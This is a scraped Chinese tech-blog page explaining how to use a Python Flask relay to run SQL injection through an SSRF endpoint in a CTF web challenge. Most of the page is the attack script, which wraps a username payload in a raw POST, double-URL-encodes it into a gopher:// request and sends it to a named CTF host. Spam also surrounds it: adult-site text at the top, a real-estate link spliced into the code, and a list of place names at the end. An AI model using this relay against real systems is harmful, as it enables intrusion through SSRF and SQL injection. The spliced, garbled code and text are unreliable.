亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Python中怎么使用Flask實現中轉注入

發布時間:2021-07-05 16:17:10 來源:億速云 閱讀:178 作者:Leah 欄目:編程語言

Python中怎么使用Flask實現中轉注入,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

  1、常常會因為構造網絡請求麻煩

  2、寫tamper嫌麻煩

  這時候我們的中轉注入就來了,這有一個Web題需要我們頻繁構造gopher去實現POST或者GET請求,這時候如果我們想要實現更自由的SQL注入,便可使用

  from flask import Flask,request

  from urllib.parse import quote

  import requests

  def urlencode(s):

  res=''

  for c in s:

  fuck=hex(ord(c)).split('0x')[1]

  if len(fuck)==1:

  fuck='0'+fuck

  res+="%"+fuck

  return res

  fuckhtml='''POST /admin.php HTTP/1.1

  Host: 127.0.0.1

  Connection: close

  Content-Type: application/x-www-form-urlencoded

  Content-Length: {length}北海購房網 http://bh.goufang.com/

  username={username}&password=129581926211651571912466741651878684928'''.replace("\n","\r\n")

  tmpPayload= fuckhtml.split("\r\n")[-1]

  tmplength = len(tmpPayload) - len('{username}')

  url="http://eci-2zehhuwx9m3o88h42zup.cloudeci1.ichunqiu.com/ssrf.php?way=gopher%3A%2F%2F127.0.0.1:80%2F_"

  app = Flask(__name__)

  @app.route('/')

  def hello_world():

  username=request.args.get('username')

  shit=fuckhtml.format(username=username,length=str(tmplength+len(username)))

  cookies={'PHPSESSID':'qitbcj1puicm4qcpf8oe1fgc17'}

  page=requests.get(url+urlencode(urlencode(shit)),proxies={'http':'http://127.0.0.1:8081'},cookies=cookies).text

  return page

  if __name__ == '__main__':

  app.run()

關于Python中怎么使用Flask實現中轉注入問題的解答就分享到這里了,希望以上內容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關注億速云行業資訊頻道了解更多相關知識。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

定日县| 株洲市| 灌阳县| 泗阳县| 临海市| 襄樊市| 诏安县| 永定县| 江华| 棋牌| 西充县| 乐陵市| 和硕县| 夹江县| 安图县| 施秉县| 洛宁县| 平安县| 星子县| 遵义市| 南木林县| 德化县| 津市市| 丰台区| 营口市| 莒南县| 大悟县| 四川省| 亚东县| 都江堰市| 凤山市| 沙湾县| 陇西县| 西乌| 隆昌县| 泌阳县| 钟祥市| 新民市| 广西| 班玛县| 株洲市|